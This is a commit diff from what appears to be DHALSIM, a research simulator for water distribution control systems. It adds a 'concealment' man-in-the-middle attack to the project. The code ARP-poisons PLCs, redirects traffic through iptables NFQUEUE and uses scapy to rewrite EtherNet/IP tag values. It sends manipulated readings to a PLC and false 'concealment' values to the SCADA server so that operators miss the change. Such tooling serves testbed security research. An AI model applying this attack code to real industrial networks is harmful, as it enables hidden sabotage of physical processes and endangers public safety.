Initial and rude version of concealment_mitm. Next should be changing the "value" parameter for a path parameter that reads a csv or equivalent in order to feed concealment data into SCADA

Author: afmurillo

dhalsim/network_attacks/concealment_mitm.py

@@ -14,7 +14,11 @@ class Error(Exception):
     """Base class for exceptions in this module."""
 
 
-class ConcealmentAttack(SyncedAttack):
+class DirectionError(Error):
+    """Raised when the optional parameter direction does not have source or destination as value"""
+
+
+class ConcealmentMiTMAttack(SyncedAttack):
     """
     todo
 
@@ -29,6 +33,7 @@ def __init__(self, intermediate_yaml_path: Path, yaml_index: int):
         # Process object to handle nfqueue
         self.nfqueue_process = None
 
+
     def setup(self):
         """
         This function start the network attack.
@@ -42,13 +47,7 @@ def setup(self):
 
         Finally, it launches the thread that will examine all captured packets.
         """
-
-        os.system(f'iptables -t mangle -A PREROUTING -p tcp --sport 44818 -s {self.target_plc_ip} -j NFQUEUE '
-                  f'--queue-num 1')
-
-        os.system('iptables -A FORWARD -p icmp -j DROP')
-        os.system('iptables -A INPUT -p icmp -j DROP')
-        os.system('iptables -A OUTPUT -p icmp -j DROP')
+        self.modify_ip_tables(True)
 
         # Launch the ARP poison by sending the required ARP network packets
         launch_arp_poison(self.target_plc_ip, self.intermediate_attack['gateway_ip'])
@@ -57,7 +56,7 @@ def setup(self):
                 if plc['name'] != self.intermediate_plc['name']:
                     launch_arp_poison(self.target_plc_ip, plc['local_ip'])
 
-        self.logger.debug(f"Naive MITM Attack ARP Poison between {self.target_plc_ip} and "
+        self.logger.debug(f"Concealment MITM Attack ARP Poison between {self.target_plc_ip} and "
                           f"{self.intermediate_attack['gateway_ip']}")
 
         queue_number = 1
@@ -87,16 +86,10 @@ def teardown(self):
                 if plc['name'] != self.intermediate_plc['name']:
                     restore_arp(self.target_plc_ip, plc['local_ip'])
 
-        self.logger.debug(f"Naive MITM Attack ARP Restore between {self.target_plc_ip} and "
+        self.logger.debug(f"MITM Attack ARP Restore between {self.target_plc_ip} and "
                           f"{self.intermediate_attack['gateway_ip']}")
 
-        os.system(f'iptables -t mangle -D PREROUTING -p tcp --sport 44818 -s {self.target_plc_ip} -j NFQUEUE '
-                  f'--queue-num 1')
-
-        os.system('iptables -D FORWARD -p icmp -j DROP')
-        os.system('iptables -D INPUT -p icmp -j DROP')
-        os.system('iptables -D OUTPUT -p icmp -j DROP')
-
+        self.modify_ip_tables(False)
         self.logger.debug(f"Restored ARP")
 
         self.logger.debug("Stopping nfqueue subprocess...")
@@ -112,6 +105,24 @@ def attack_step(self):
         pass
 
 
+    @staticmethod
+    def modify_ip_tables(append=True):
+
+        if append:
+            os.system(f'iptables -t mangle -A PREROUTING -p tcp -j NFQUEUE --queue-num 1')
+
+            os.system('iptables -A FORWARD -p icmp -j DROP')
+            os.system('iptables -A INPUT -p icmp -j DROP')
+            os.system('iptables -A OUTPUT -p icmp -j DROP')
+        else:
+
+            os.system(f'iptables -t mangle -D INPUT -p tcp -j NFQUEUE --queue-num 1')
+            os.system(f'iptables -t mangle -D FORWARD -p tcp -j NFQUEUE --queue-num 1')
+
+            os.system('iptables -D FORWARD -p icmp -j DROP')
+            os.system('iptables -D INPUT -p icmp -j DROP')
+            os.system('iptables -D OUTPUT -p icmp -j DROP')
+
 def is_valid_file(parser_instance, arg):
     """Verifies whether the intermediate yaml path is valid."""
     if not os.path.exists(arg):
@@ -131,7 +142,7 @@ def is_valid_file(parser_instance, arg):
 
     args = parser.parse_args()
 
-    attack = ConcealmentAttack(
+    attack = ConcealmentMiTMAttack(
         intermediate_yaml_path=Path(args.intermediate_yaml),
         yaml_index=args.index)
     attack.main_loop()

dhalsim/network_attacks/concealment_netfilter_queue.py

@@ -10,41 +10,80 @@
 
 from dhalsim.network_attacks.utilities import translate_payload_to_float, translate_float_to_payload
 
-class ConcealmentNetfilterQueue(PacketQueue):
+
+class ConcealmentMiTMNetfilterQueue(PacketQueue):
 
     def __init__(self,  intermediate_yaml_path: Path, yaml_index: int, queue_number: int ):
         super().__init__(intermediate_yaml_path, yaml_index, queue_number)
+        self.attacked_tag = self.intermediate_attack['tag']
+        self.scada_session_ids = []
+        self.attack_session_ids = []
 
-    def capture(self, pkt):
+    def capture(self, packet):
         """
         This function is the function that will run in the thread started in the setup function.
 
         For every packet that enters the netfilterqueue, it will check its length. If the length is
         in between 102, we are dealing with a CIP packet. We then change the payload of that
         packet and delete the original checksum.
-        :param pkt: The captured packet.
+        :param packet: The captured packet.
         """
-        self.logger.debug('capture method')
         try:
-            p = IP(pkt.get_payload())
-            #self.logger.debug('packet')
-            if len(p) == 102:
-                self.logger.debug('modifying')
-                if 'value' in self.intermediate_attack.keys():
-                    p[Raw].load = translate_float_to_payload(
-                        self.intermediate_attack['value'], p[Raw].load)
-                elif 'offset' in self.intermediate_attack.keys():
-                    p[Raw].load = translate_float_to_payload(
-                        translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
-                            'offset'], p[Raw].load)
-
-                del p[TCP].chksum
-
-                pkt.set_payload(bytes(p))
-                self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
-
-            pkt.accept()
+            p = IP(packet.get_payload())
+            if 'TCP' in p:
+                if len(p) == 116:
+                    this_session =  int.from_bytes(p[Raw].load[4:8], sys.byteorder)
+                    tag_name = p[Raw].load.decode(encoding='latin-1')[54:56]
+                    self.logger.debug('ENIP TCP Session ID: ' + str(this_session))
+                    self.logger.debug('Received tag is: ' + tag_name)
+                    self.logger.debug('Attack tag is: ' + self.attacked_tag)
+                    if self.attacked_tag == tag_name:
+                        # This is a packet being sent to SCADA server, conceal the manipulation
+                        self.logger.debug('Packet source: ' + p[IP].src )
+                        self.logger.debug('SCADA IP: ' + self.intermediate_yaml['scada']['public_ip'])
+                        if p[IP].src == self.intermediate_yaml['scada']['public_ip']:
+                            self.logger.debug('SCADA session: ' + str(this_session))
+                            self.scada_session_ids.append(this_session)
+                        else:
+                            self.logger.debug('PLC session: ' + str(this_session))
+                            self.attack_session_ids.append(this_session)
+
+                if len(p) == 102:
+                    this_session = int.from_bytes(p[Raw].load[4:8], sys.byteorder)
+                    if this_session in self.attack_session_ids:
+                        self.logger.debug('Modifying because session is: ' + str(this_session))
+                        value = translate_payload_to_float(p[Raw].load)
+                        self.logger.debug('tag value is:' + str(value))
+
+                        if 'value' in self.intermediate_attack.keys():
+                            p[Raw].load = translate_float_to_payload(
+                                self.intermediate_attack['value'], p[Raw].load)
+                        elif 'offset' in self.intermediate_attack.keys():
+                            p[Raw].load = translate_float_to_payload(
+                                translate_payload_to_float(p[Raw].load) + self.intermediate_attack[
+                                    'offset'], p[Raw].load)
+
+                        del p[IP].chksum
+                        del p[TCP].chksum
+
+                        packet.set_payload(bytes(p))
+                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+
+
+                    elif this_session in self.scada_session_ids:
+                        self.logger.debug('Concealing to SCADA: ' + str(this_session))
+                        p[Raw].load = translate_float_to_payload(
+                            self.intermediate_attack['concealment_value'], p[Raw].load)
+
+                        del p[IP].chksum
+                        del p[TCP].chksum
+
+                        packet.set_payload(bytes(p))
+                        self.logger.debug(f"Value of network packet for {p[IP].dst} overwritten.")
+
+            packet.accept()
         except Exception as exc:
+            print(exc)
             if self.nfqueue:
                 self.nfqueue.unbind()
             sys.exit(0)
@@ -70,7 +109,7 @@ def is_valid_file(parser_instance, arg):
 
     args = parser.parse_args()
 
-    attack = NaiveNetfilterQueue(
+    attack = ConcealmentMiTMNetfilterQueue(
         intermediate_yaml_path=Path(args.intermediate_yaml),
         yaml_index=args.index,
         queue_number = args.number)

dhalsim/network_attacks/mitm_netfilter_queue.py

@@ -10,7 +10,6 @@
 
 from dhalsim.network_attacks.utilities import translate_payload_to_float, translate_float_to_payload
 
-import struct
 
 class MiTMNetfilterQueue(PacketQueue):
 

dhalsim/parser/config_parser.py

@@ -228,15 +228,19 @@ class SchemaParser:
                            error="Length of name must be between 1 and 20, '{}' has invalid length")
                 ),
                 'trigger': trigger,
+                'target': And(
+                    str,
+                    string_pattern
+                ),
                 'tag': And(
                     str,
                     string_pattern,
                 ),
-                Or('value', 'offset', only_one=True,
-                   error="'tags' should have either a 'value' or 'offset' attribute."): Or(float, And(int, Use(float))),
-                'target': And(
-                    str,
-                    string_pattern
+                'value': And(
+                    Or(float, And(int, Use(float)))
+                ),
+                'concealment_value': And(
+                    Or(float, And(int, Use(float)))
                 )
             },
             {

examples/ctown_topology/ctown_concealment_mitm.yaml

@@ -3,8 +3,9 @@ network_attacks:
   type: concealment_mitm
   tag: T3
   target: PLC4
-  value: 7.0
+  value: 42.0
+  concealment_value: 84
   trigger:
-    start: 20
-    end: 100
+    start: 5
+    end: 15
     type: time

examples/ctown_topology/ctown_config.yaml

@@ -1,9 +1,9 @@
 inp_file: ctown_map.inp
-iterations: 2880
+iterations: 20
 network_topology_type: complex
 plcs: !include ctown_plcs.yaml
 
 log_level: debug
 simulator: epynet
 demand: pdd
-attacks: !include ctown_mitm.yaml
+attacks: !include ctown_concealment_mitm.yaml

requirements.txt

@@ -1,2 +1,3 @@
 pyyaml
-mininet
+mininet
+scapy